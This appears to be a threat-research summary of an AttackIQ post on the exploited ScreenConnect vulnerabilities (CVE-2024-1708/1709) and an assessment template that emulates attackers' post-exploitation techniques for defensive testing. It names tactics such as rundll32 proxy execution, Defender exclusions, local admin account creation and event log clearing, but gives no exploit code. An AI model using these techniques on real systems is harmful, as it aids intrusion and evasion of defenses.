Threat Research

Response to ScreenConnect’s Zero-day Vulnerability

AttackIQ

ConnectWise disclosed two critical ScreenConnect vulnerabilities (CVE-2024-1708 path traversal and CVE-2024-1709 authentication bypass) that were actively exploited in a campaign dubbed “SlashAndGrab,” enabling unauthorized access and ransomware deployment by multiple groups. AttackIQ released an assessment template that emulates the post-exploitation TTPs observed in these incidents to help organizations validate detection and prevention controls. #ScreenConnect #SlashAndGrab #BlackBasta #LockBit #Bl00dy

Keypoints

  • Two vulnerabilities in ScreenConnect 23.9.8 (CVE-2024-1708 and CVE-2024-1709) allowed trivial exploitation to gain unauthorized access.
  • Threat actors exploited these flaws (named SlashAndGrab) to deploy ransomware families linked to Black Basta, LockBit, and Bl00dy.
  • AttackIQ created an assessment template that emulates post-exploitation TTPs observed in these attacks to validate security controls.
  • The template covers Execution, Persistence, Defense Evasion, Command and Control, and Discovery techniques mapped to MITRE ATT&CK.
  • Notable emulated techniques include msiexec and rundll32 proxy execution, startup autostart, scheduled tasks, WMI, account creation, Defender exclusions, event log clearing, SSH C2, and ingress tool transfer.
  • AttackIQ recommends prioritizing detection and mitigation for Rundll32 proxy execution and other high-risk techniques, and following ConnectWise patching/detection guidance first.

MITRE Techniques

  • [T1218.007] Msiexec – Executes a Windows Installer Package (MSI) via msiexec.exe to run adversary-controlled code (‘This scenario executes a Windows Installer Package (MSI) using the msiexec.exe utility.’)
  • [T1218.011] Rundll32 – Uses RunDll32 to load and invoke an export from a DLL to execute payloads (‘This scenario executes RunDll32 with an AttackIQ DLL and calls an export to mimic previously reported malicious activity.’)
  • [T1547.001] Startup Folder – Achieves persistence by placing a LNK in the Startup folder to run at next logon (‘This scenario creates a LNK file in this directory that would execute at next logon for all users.’)
  • [T1053.005] Scheduled Task – Creates scheduled tasks via schtasks to maintain persistence and schedule actions (‘This scenario creates a new scheduled task using the schtasks utility.’)
  • [T1047] Windows Management Instrumentation – Uses WMI to launch executables or commands when event consumers trigger actions (‘WMI can be used to launch an executable or command when a common event consumer is triggered.’)
  • [T1136.001] Create Account: Local Account – Adds local user accounts via net user to retain access (‘This scenario creates a new account using net user to ensure persistence in the system.’)
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Modifies Microsoft Defender settings and exclusions (e.g., Add-MpPreference and Set-MpPreference) to evade detection (‘This scenario uses the Add-MpPreference cmdlet to add a directory to the exclusion list in Microsoft Defender.’; ‘This scenario uses the Set-MpPreference cmdlet to modify the DisableRealtimeMonitoring in Microsoft Defender.’)
  • [T1078.003] Valid Accounts: Local Accounts – Attempts to add users to local Administrators group using net localgroup to escalate privileges (‘This scenario will attempt to add a local user to a local Administrators group using the net localgroup command.’)
  • [T1070.001] Indicator Removal: Clear Windows Event Logs – Removes evidence by clearing event logs with wevtutil.exe (‘The scenario will use the wevtutil.exe binary to clear event logs from the system.’)
  • [T1021.004] Remote Services: SSH – Establishes outbound SSH connections to external servers for C2/exfiltration testing (‘This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.’)
  • [T1105] Ingress Tool Transfer – Downloads payloads to memory and disk to test delivery and endpoint controls (‘This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.’)
  • [T1018] Remote System Discovery – Searches for other domain computers and domain controllers using net group and nltest to map the environment (‘This scenario will search for other domain computers using the net group command.’ / ‘This scenario executes the nltest command to gather a list of domain controllers associated with a domain.’)
  • [T1069] Permission Groups Discovery – Enumerates permission groups with net group /domain to identify privileged accounts (‘This scenario will enumerate permission groups using the net group /domain command.’)
  • [T1482] Domain Trust Discovery – Calls nltest /trusted_domains to list trusted Active Directory domains tied to the host (‘This scenario calls the native nltest utility with the /trusted_domains option to retrieve a list of trusted Active Directory domains associated with this host.’)

Indicators of Compromise

  • [File names / Binaries] Commands and utilities used in scenarios – msiexec.exe, rundll32.exe, and other utilities such as wevtutil.exe and schtasks.exe.
  • [Command-line artifacts] Account and group manipulation commands – net user, net localgroup (used to create accounts and add users to Administrators).
  • [Software / Version] Affected product/version – ScreenConnect 23.9.8 (vulnerable to CVE-2024-1708 and CVE-2024-1709).
  • [URLs / Domains] Source and reference links in the article – https://www.attackiq.com/2024/03/08/response-to-screenconnects-zero-day-vulnerability/, and related media on youtube.com (context: reporting and supplemental content).

Attackers exploited trivial path traversal and authentication-bypass flaws in ScreenConnect 23.9.8 to gain access, after which operators executed a range of post-exploitation actions. The observed TTPs include proxy execution of payloads via msiexec and rundll32, creating persistence through the Startup folder and scheduled tasks, using WMI for execution, creating local accounts, and changing Defender preferences to add exclusions or disable realtime monitoring. Operators also removed evidence by clearing event logs and performed discovery (net group, nltest, GetCurrentDomain) to map AD and permission groups.

The AttackIQ assessment template models these behaviors across Execution, Persistence, Defense Evasion, Command and Control, Discovery, and Ingress Tool Transfer to validate detection and prevention pipelines. Scenarios demonstrate delivery methods (download-to-memory and save-to-disk), outbound restrictions via SSH, and typical command-line artifacts (net user, net localgroup, schtasks, wevtutil). The template thus provides deterministic ways to test whether controls detect proxy-loading via rundll32/msiexec, defender exclusion changes, scheduled-task persistence, event log clearing, and AD discovery techniques.

For defenders, prioritize applying ConnectWise patches and guidance, then validate detections for rundll32/msiexec proxy execution (look for unusual command-line paths, temporary dirs, and export names), monitor for changes to Defender preferences and exclusions, detect creation of local accounts and scheduled tasks, and alert on event log clearing. Use the AttackIQ template to exercise these detections and iterate on rules, telemetry collection, and response playbooks to close gaps exposed by SlashAndGrab-style exploitation.

Read more: https://www.attackiq.com/2024/03/08/response-to-screenconnects-zero-day-vulnerability/